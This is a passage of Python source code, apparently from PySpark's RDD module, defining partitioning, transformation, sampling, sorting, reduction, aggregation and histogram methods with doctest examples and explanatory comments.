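#     literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
#     literal_re.sub(r'\1\2', ">>> f()\n[u'a', u'b']")   # -> ">>> f()\n['a', 'b']"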
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
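# Minimal usage sketch (illustrative, not part of the original source): a
# Partitioner maps a key to a partition index, and two Partitioners compare
# equal when both the partition count and the partition function match, which
# is what lets partitionBy() below skip a shuffle for an already-partitioned RDD.
#
#     p = Partitioner(4, portable_hash)
#     p("spark")                           # index in range(4), stable across
#                                          # workers once PYTHONHASHSEED is fixed
#     p == Partitioner(4, portable_hash)   # True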
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
        If no storage level is specified, this defaults to C{MEMORY_ONLY}.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
        Gets the name of the file to which this RDD was checkpointed.
        Not defined if the RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
        Returns the number of partitions in this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
            count of the given :class:`RDD`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
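    # Worked example (illustrative arithmetic, not part of the original source):
    # for num = 100 and total = 10000 without replacement, p = 0.01,
    # gamma = -log(0.00005) / 10000 ~= 0.00099, and the returned fraction is
    # roughly 0.01 + 0.00099 + sqrt(0.00099**2 + 2 * 0.00099 * 0.01) ~= 0.0156,
    # i.e. oversampling by about 56% so an undersized sample is very unlikely.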
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
        >>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
        # we have numPartitions many parts but one of them has
        # an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
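    # Illustrative note (not part of the original source): the range partitioner
    # above is built from a sample of the keys. For example, with
    # numPartitions = 3 and sorted samples ['a', 'c', 'f', 'k', 'p', 'z'], the
    # boundaries are the samples at indices len * 1/3 and len * 2/3, i.e.
    # ['f', 'p'], so keys up to and including 'f' go to partition 0, keys after
    # 'f' up to 'p' go to partition 1, and the rest go to partition 2 (the
    # index is mirrored when sorting in descending order).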
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
        The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
        the type of this RDD. Thus, we need one operation for merging a T into
        a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
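    # Illustrative trace (not from the original source): with 100 partitions and
    # the default depth=2, scale = ceil(100 ** 0.5) = 10, so the loop performs
    # one intermediate reduceByKey into 10 partitions (since 100 > 10 + 100/10)
    # and then stops (10 <= 10 + 10/10), leaving the final combOp to the driver.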
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
        e.g. [1, 10, 20, 50] means the buckets are [1, 10) [10, 20) [20, 50],
        i.e. 1<=x<10, 10<=x<20, 20<=x<=50. Given the inputs 1 and 50, the
        resulting histogram would be [1, 0, 1].
        If your buckets are evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
        element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
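    # Worked example (illustrative, not part of the original source): for
    # buckets [0, 25, 50] the per-partition counters have three slots; the last
    # slot only collects values equal to maxv (the closed right edge), and
    # popping it into counters[-1] is what folds 50 into the final [25, 50] bucket.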
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
